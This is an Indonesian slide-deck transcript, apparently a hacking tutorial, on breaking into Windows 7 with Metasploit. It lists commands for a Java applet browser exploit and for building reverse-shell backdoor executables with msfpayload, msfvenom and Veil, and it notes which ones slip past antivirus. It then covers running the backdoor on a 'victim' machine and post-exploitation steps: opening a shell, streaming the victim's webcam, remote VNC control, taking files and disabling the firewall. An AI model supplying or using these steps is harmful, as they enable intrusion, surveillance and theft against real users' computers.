Exploit windows
-
Upload
zaenal-abidin -
Category
Internet
-
view
130 -
download
0
Transcript of Exploit windows
ZAENAL ABIDIN
Exploit windows
Sebelum melulai exploit
Jalankan service metasploit
- Applications => Kali Linux => System services => Metasploit => Comunity / pro start
Untuk menjalankan Metasploit freamwork
- Applications => Kali linux => Exploitation tools => Metasploit => Metasploit freamwork
Menjalankan metasploit melalui terminal
- bukan terminal ketik msfconsole
Exploit windows mengunakan java applet
- ketik: use exploit/multi/browser/java_jre17_provider_skeleton
Tekan enter
- ketik: set payload java/Meterpreter/reverse_tcp
Tekan enter
- ketik: set lhost (ketik ip komputer yang kamu gunakan)
Tekan enter
- ketik: set srvhost (ketik ip kamputer yang kamu gunakan)
ZAENAL ABIDIN
Tekan enter
- ketik: set uripath /
Tekan enter
- exploit tekan enter
Di komputer korban buka browser dan ketik alamat website: http://172.16.204.1:8080/
Alamat website di dapat dari: USING URL: http://172.16.204.1:8080/
Sudah berhasil masuk ke os windows7
Exploit windows menggunakan Backdoor
Banyak cara untuk membuat backdoor
Bisa menggunakan setoolkit, msfpayload, msfvenom, veil dll.
ZAENAL ABIDIN
Menggunakan msfpayload
- buka terminal kemudian ketik kode di bawah ini: msfpayload windows/meterpreter/reverse_tcp lhost=172.16.204.1 lport=4444 x > /root/JanganDibuka.exe
Ket:
Lhost = ip komputer yang kamu gunakan
Lport = isi dengan port 4444
/root = letak backdoor yang sudah jadi
JanganDibuka = filenema backdoor yang akan di buat
Menggunakan msfvenom
- buka teminal ketik kode di bawah ini: msfvenom -p windows/meterpreter/reverse_tcp - o
Ketik di bawah ini untuk membuat backdoor
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=172.16.204.1 lport=4444 -f exe>/root/JanganDibuka.exe
Menggunakan veil
Sebelum menggunakan veil
ZAENAL ABIDIN
Install dulu tool veil
- buka terminal ketik wget https://github.com/ChrisTruncer/Veil/archive/master.zip
- Kemudian extrak menggunakan perintah unzip master.zip
- install veil: /root/Veil-Evasion-master/setup/setup.sh
Membuat backdoor
- masuk terminal kerik /root/Veil-Evasion-master/Veil-Evasion.py
- ketik use
Ketik 25
ZAENAL ABIDIN
Ketik generate
Ketik 1
Tekan enter
ketik ip komputer yang kamu gunakan
Ketik port 4444
ZAENAL ABIDIN
Tekan enter
Ketik nama backdoor yang akan dibuat
Ketik 1
Letak backdoor yang suka jadi di : /root/veil-output/compiled/JanganDibuka.exe
Di atas sudah ada beberapa contoh membuat backdoor Kalau menggunakan backdoor :
- msfpayload = mudah terdeteksi antivirus
ZAENAL ABIDIN
- msfvenom = bisa lolos dari antivirus
- veil = bisa lolos dari antivirus
Menggunakan Backdoor
- buka terminal ketik:
Msfconsole
Ketik : use exploit/multi/handler
Tekan enter
Ketik : set payload windows/meterpreter/reverse_tcp
Tekan enter
Ketik : set lhost (ip komputer yang kamu gunakan)
Tekan enter
Ketik : set lport (port nya samakan dengan port backdoor yang kamu telah buat)
Tekan enter
Ketik : exploit
Tekan enter
Copy dan jalankan backdoor di komputer korban
ZAENAL ABIDIN
Ketik help : mengetahui perintah meterpreter
Berhasil masuk ke windows7
ZAENAL ABIDIN
ZAENAL ABIDIN
Ketik shell untuk masuk cmd windows7
Ketik exit : keluar dari cmd
Ketik screenshot : sreenshot windows7
Ketik webcam_stream : menjalankan webcam komputer korban
ZAENAL ABIDIN
Ketik run vnc : remote komputer korban
Untuk mengambil file dari komputer korban
Ketik download \\ lokasi file korban
Contoh: download c:\\wallpaper.jpg
ZAENAL ABIDIN
Untuk menaruh file ke komputer korban
Ketik upload \\ file yang akan ditaruh di komputer korban
Contoh: upload gambar.jpg c:\\
Untuk disable firewall windows
Ketik: netsh firewall set opmode disable